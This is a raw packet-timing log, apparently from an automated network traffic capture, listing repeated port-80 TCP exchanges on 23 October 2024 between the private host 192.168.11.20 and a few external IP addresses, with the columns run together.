                                                                                                                                                                                                                        Oct 23, 2024 18:54:12.352799892 CEST80498023.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:12.353116989 CEST4980280192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:54:12.360245943 CEST4980280192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:54:12.460019112 CEST80498023.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:12.462300062 CEST80498023.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:12.462609053 CEST4980280192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:54:13.875842094 CEST4980280192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:54:13.975342989 CEST80498023.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:14.893279076 CEST4980380192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:54:14.992791891 CEST80498033.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:14.993016958 CEST4980380192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:54:15.000437975 CEST4980380192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:54:15.000549078 CEST4980380192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:54:15.100016117 CEST80498033.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:15.100064993 CEST80498033.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:15.100291967 CEST80498033.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:15.100333929 CEST80498033.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:15.100363016 CEST80498033.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:15.100430965 CEST80498033.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:15.100460052 CEST80498033.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:15.101696014 CEST80498033.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:15.101866007 CEST4980380192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:54:16.515918970 CEST4980380192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:54:16.615731955 CEST80498033.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:17.533313036 CEST4980480192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:54:17.633208036 CEST80498043.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:17.633399963 CEST4980480192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:54:17.638305902 CEST4980480192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:54:17.737876892 CEST80498043.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:17.741117954 CEST80498043.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:17.741167068 CEST80498043.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:17.741445065 CEST4980480192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:54:17.743313074 CEST4980480192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:54:17.745955944 CEST80498043.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:17.746280909 CEST4980480192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:54:17.843075991 CEST80498043.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:22.922868013 CEST4980580192.168.11.20162.241.63.77
                                                                                                                                                                                                                        Oct 23, 2024 18:54:23.038496017 CEST8049805162.241.63.77192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:23.038666010 CEST4980580192.168.11.20162.241.63.77
                                                                                                                                                                                                                        Oct 23, 2024 18:54:23.046096087 CEST4980580192.168.11.20162.241.63.77
                                                                                                                                                                                                                        Oct 23, 2024 18:54:23.161751986 CEST8049805162.241.63.77192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:23.266845942 CEST8049805162.241.63.77192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:23.266864061 CEST8049805162.241.63.77192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:23.267014027 CEST4980580192.168.11.20162.241.63.77
                                                                                                                                                                                                                        Oct 23, 2024 18:54:24.560955048 CEST4980580192.168.11.20162.241.63.77
                                                                                                                                                                                                                        Oct 23, 2024 18:54:25.578433990 CEST4980680192.168.11.20162.241.63.77
                                                                                                                                                                                                                        Oct 23, 2024 18:54:25.693913937 CEST8049806162.241.63.77192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:25.694111109 CEST4980680192.168.11.20162.241.63.77
                                                                                                                                                                                                                        Oct 23, 2024 18:54:25.701554060 CEST4980680192.168.11.20162.241.63.77
                                                                                                                                                                                                                        Oct 23, 2024 18:54:25.817089081 CEST8049806162.241.63.77192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:25.913273096 CEST8049806162.241.63.77192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:25.913285971 CEST8049806162.241.63.77192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:25.913453102 CEST4980680192.168.11.20162.241.63.77
                                                                                                                                                                                                                        Oct 23, 2024 18:54:27.216670036 CEST4980680192.168.11.20162.241.63.77
                                                                                                                                                                                                                        Oct 23, 2024 18:54:28.234229088 CEST4980780192.168.11.20162.241.63.77
                                                                                                                                                                                                                        Oct 23, 2024 18:54:28.349982977 CEST8049807162.241.63.77192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:28.350342035 CEST4980780192.168.11.20162.241.63.77
                                                                                                                                                                                                                        Oct 23, 2024 18:54:28.359085083 CEST4980780192.168.11.20162.241.63.77
                                                                                                                                                                                                                        Oct 23, 2024 18:54:28.359146118 CEST4980780192.168.11.20162.241.63.77
                                                                                                                                                                                                                        Oct 23, 2024 18:54:28.359201908 CEST4980780192.168.11.20162.241.63.77
                                                                                                                                                                                                                        Oct 23, 2024 18:54:28.474950075 CEST8049807162.241.63.77192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:28.475055933 CEST8049807162.241.63.77192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:28.475145102 CEST8049807162.241.63.77192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:28.584069967 CEST8049807162.241.63.77192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:28.584088087 CEST8049807162.241.63.77192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:28.584202051 CEST4980780192.168.11.20162.241.63.77
                                                                                                                                                                                                                        Oct 23, 2024 18:54:29.872320890 CEST4980780192.168.11.20162.241.63.77
                                                                                                                                                                                                                        Oct 23, 2024 18:54:30.889770985 CEST4980880192.168.11.20162.241.63.77
                                                                                                                                                                                                                        Oct 23, 2024 18:54:31.005599022 CEST8049808162.241.63.77192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:31.005816936 CEST4980880192.168.11.20162.241.63.77
                                                                                                                                                                                                                        Oct 23, 2024 18:54:31.010822058 CEST4980880192.168.11.20162.241.63.77
                                                                                                                                                                                                                        Oct 23, 2024 18:54:31.126758099 CEST8049808162.241.63.77192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:31.253310919 CEST8049808162.241.63.77192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:31.293807030 CEST4980880192.168.11.20162.241.63.77
                                                                                                                                                                                                                        Oct 23, 2024 18:54:36.254290104 CEST8049808162.241.63.77192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:36.254497051 CEST4980880192.168.11.20162.241.63.77
                                                                                                                                                                                                                        Oct 23, 2024 18:54:36.255083084 CEST4980880192.168.11.20162.241.63.77
                                                                                                                                                                                                                        Oct 23, 2024 18:54:36.370613098 CEST8049808162.241.63.77192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:41.380881071 CEST4980980192.168.11.20185.134.245.113
                                                                                                                                                                                                                        Oct 23, 2024 18:54:41.573638916 CEST8049809185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:41.573865891 CEST4980980192.168.11.20185.134.245.113
                                                                                                                                                                                                                        Oct 23, 2024 18:54:41.588176012 CEST4980980192.168.11.20185.134.245.113
                                                                                                                                                                                                                        Oct 23, 2024 18:54:41.784826040 CEST8049809185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:41.784852028 CEST8049809185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:41.784868002 CEST8049809185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:41.785147905 CEST4980980192.168.11.20185.134.245.113
                                                                                                                                                                                                                        Oct 23, 2024 18:54:43.103852987 CEST4980980192.168.11.20185.134.245.113
                                                                                                                                                                                                                        Oct 23, 2024 18:54:44.121287107 CEST4981080192.168.11.20185.134.245.113
                                                                                                                                                                                                                        Oct 23, 2024 18:54:44.321160078 CEST8049810185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:44.321353912 CEST4981080192.168.11.20185.134.245.113
                                                                                                                                                                                                                        Oct 23, 2024 18:54:44.328823090 CEST4981080192.168.11.20185.134.245.113
                                                                                                                                                                                                                        Oct 23, 2024 18:54:44.531409025 CEST8049810185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:44.531461000 CEST8049810185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:44.531491995 CEST8049810185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:44.531621933 CEST4981080192.168.11.20185.134.245.113
                                                                                                                                                                                                                        Oct 23, 2024 18:54:45.837578058 CEST4981080192.168.11.20185.134.245.113
                                                                                                                                                                                                                        Oct 23, 2024 18:54:46.855005980 CEST4981180192.168.11.20185.134.245.113
                                                                                                                                                                                                                        Oct 23, 2024 18:54:47.046552896 CEST8049811185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:47.046782017 CEST4981180192.168.11.20185.134.245.113
                                                                                                                                                                                                                        Oct 23, 2024 18:54:47.054519892 CEST4981180192.168.11.20185.134.245.113
                                                                                                                                                                                                                        Oct 23, 2024 18:54:47.054554939 CEST4981180192.168.11.20185.134.245.113
                                                                                                                                                                                                                        Oct 23, 2024 18:54:47.054627895 CEST4981180192.168.11.20185.134.245.113
                                                                                                                                                                                                                        Oct 23, 2024 18:54:47.245208979 CEST8049811185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:47.245326042 CEST8049811185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:47.245516062 CEST8049811185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:47.245529890 CEST8049811185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:47.254770994 CEST8049811185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:47.254806042 CEST8049811185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:47.254940987 CEST4981180192.168.11.20185.134.245.113
                                                                                                                                                                                                                        Oct 23, 2024 18:54:48.555747986 CEST4981180192.168.11.20185.134.245.113
                                                                                                                                                                                                                        Oct 23, 2024 18:54:49.573183060 CEST4981280192.168.11.20185.134.245.113
                                                                                                                                                                                                                        Oct 23, 2024 18:54:49.766392946 CEST8049812185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:49.766633034 CEST4981280192.168.11.20185.134.245.113
                                                                                                                                                                                                                        Oct 23, 2024 18:54:49.771640062 CEST4981280192.168.11.20185.134.245.113
                                                                                                                                                                                                                        Oct 23, 2024 18:54:49.964869022 CEST8049812185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:49.965287924 CEST8049812185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:49.965363026 CEST8049812185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:49.965409994 CEST8049812185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:49.965478897 CEST8049812185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:49.965518951 CEST8049812185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:49.965591908 CEST4981280192.168.11.20185.134.245.113
                                                                                                                                                                                                                        Oct 23, 2024 18:54:49.965718985 CEST4981280192.168.11.20185.134.245.113
                                                                                                                                                                                                                        Oct 23, 2024 18:54:49.968800068 CEST4981280192.168.11.20185.134.245.113
                                                                                                                                                                                                                        Oct 23, 2024 18:54:50.161791086 CEST8049812185.134.245.113192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:55.091267109 CEST4981380192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:54:55.186496973 CEST8049813172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:55.186773062 CEST4981380192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:54:55.194228888 CEST4981380192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:54:55.289215088 CEST8049813172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:55.537986040 CEST8049813172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:55.538037062 CEST8049813172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:55.538176060 CEST4981380192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:54:55.538203001 CEST8049813172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:55.538304090 CEST8049813172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:55.538321018 CEST8049813172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:55.538443089 CEST4981380192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:54:55.538572073 CEST8049813172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:55.538585901 CEST8049813172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:55.538670063 CEST8049813172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:55.538722038 CEST4981380192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:54:55.538815022 CEST4981380192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:54:56.710159063 CEST4981380192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:54:57.727610111 CEST4981480192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:54:57.821975946 CEST8049814172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:57.822197914 CEST4981480192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:54:57.829647064 CEST4981480192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:54:57.923990011 CEST8049814172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:58.170058966 CEST8049814172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:58.170197964 CEST8049814172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:58.170312881 CEST8049814172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:58.170346022 CEST4981480192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:54:58.170442104 CEST8049814172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:58.170522928 CEST8049814172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:58.170586109 CEST8049814172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:58.170608044 CEST8049814172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:58.170619011 CEST8049814172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:54:58.170787096 CEST4981480192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:54:58.171001911 CEST4981480192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:54:59.334642887 CEST4981480192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:55:00.352031946 CEST4981580192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:55:00.447243929 CEST8049815172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:00.447374105 CEST4981580192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:55:00.454953909 CEST4981580192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:55:00.455003023 CEST4981580192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:55:00.455051899 CEST4981580192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:55:00.550087929 CEST8049815172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:00.550146103 CEST8049815172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:00.550156116 CEST8049815172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:00.550309896 CEST8049815172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:00.550436020 CEST8049815172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:00.550551891 CEST8049815172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:00.550677061 CEST8049815172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:00.798933029 CEST8049815172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:00.798960924 CEST8049815172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:00.799105883 CEST4981580192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:55:00.799137115 CEST8049815172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:00.799206972 CEST8049815172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:00.799340963 CEST8049815172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:00.799361944 CEST8049815172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:00.799374104 CEST8049815172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:00.799448967 CEST4981580192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:55:00.799560070 CEST4981580192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:55:00.800009966 CEST8049815172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:00.800134897 CEST4981580192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:55:01.959073067 CEST4981580192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:55:02.976427078 CEST4981680192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:55:03.071233034 CEST8049816172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:03.071404934 CEST4981680192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:55:03.081058025 CEST4981680192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:55:03.175842047 CEST8049816172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:03.421797037 CEST8049816172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:03.422719955 CEST8049816172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:03.422880888 CEST4981680192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:55:03.423918009 CEST4981680192.168.11.20172.67.148.133
                                                                                                                                                                                                                        Oct 23, 2024 18:55:03.518780947 CEST8049816172.67.148.133192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:08.592740059 CEST4981780192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:08.692171097 CEST80498173.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:08.692584038 CEST4981780192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:08.699902058 CEST4981780192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:08.799221992 CEST80498173.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:08.801088095 CEST80498173.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:08.801289082 CEST4981780192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:10.207245111 CEST4981780192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:10.306663036 CEST80498173.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:11.224999905 CEST4981880192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:11.324487925 CEST80498183.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:11.324600935 CEST4981880192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:11.332071066 CEST4981880192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:11.431766033 CEST80498183.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:11.433783054 CEST80498183.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:11.433912992 CEST4981880192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:12.847207069 CEST4981880192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:12.946480036 CEST80498183.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:13.864762068 CEST4981980192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:13.964914083 CEST80498193.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:13.965086937 CEST4981980192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:13.976592064 CEST4981980192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:13.976644039 CEST4981980192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:14.077193022 CEST80498193.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:14.077647924 CEST80498193.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:14.077718019 CEST80498193.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:14.078409910 CEST80498193.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:14.078758955 CEST80498193.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:14.078800917 CEST80498193.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:14.078828096 CEST80498193.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:14.079124928 CEST80498193.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:14.079309940 CEST4981980192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:15.487315893 CEST4981980192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:15.587255955 CEST80498193.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:16.506205082 CEST4982080192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:16.606503010 CEST80498203.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:16.606801033 CEST4982080192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:16.613600016 CEST4982080192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:16.713303089 CEST80498203.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:19.657341003 CEST80498203.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:19.657387018 CEST80498203.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:19.657726049 CEST4982080192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:19.659666061 CEST4982080192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:19.664211035 CEST80498203.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:19.664794922 CEST4982080192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:19.759500027 CEST80498203.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:24.818223000 CEST4982180192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:24.917867899 CEST80498213.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:24.918103933 CEST4982180192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:24.926263094 CEST4982180192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:25.025573015 CEST80498213.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:25.031220913 CEST80498213.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:25.031464100 CEST4982180192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:26.438100100 CEST4982180192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:26.537667990 CEST80498213.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:27.455646992 CEST4982280192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:27.555135965 CEST80498223.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:27.555313110 CEST4982280192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:27.562755108 CEST4982280192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:27.662084103 CEST80498223.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:27.663881063 CEST80498223.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:27.664047956 CEST4982280192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:29.078134060 CEST4982280192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:29.177970886 CEST80498223.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:30.095854998 CEST4982380192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:30.195727110 CEST80498233.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:30.195889950 CEST4982380192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:30.203603983 CEST4982380192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:30.203632116 CEST4982380192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:30.203701019 CEST4982380192.168.11.203.33.130.190
                                                                                                                                                                                                                        Oct 23, 2024 18:55:30.303443909 CEST80498233.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:30.303556919 CEST80498233.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:30.303734064 CEST80498233.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:30.303935051 CEST80498233.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:30.304060936 CEST80498233.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:30.304233074 CEST80498233.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:30.304359913 CEST80498233.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:30.305763006 CEST80498233.33.130.190192.168.11.20
                                                                                                                                                                                                                        Oct 23, 2024 18:55:30.305887938 CEST4982380192.168.11.203.33.130.190
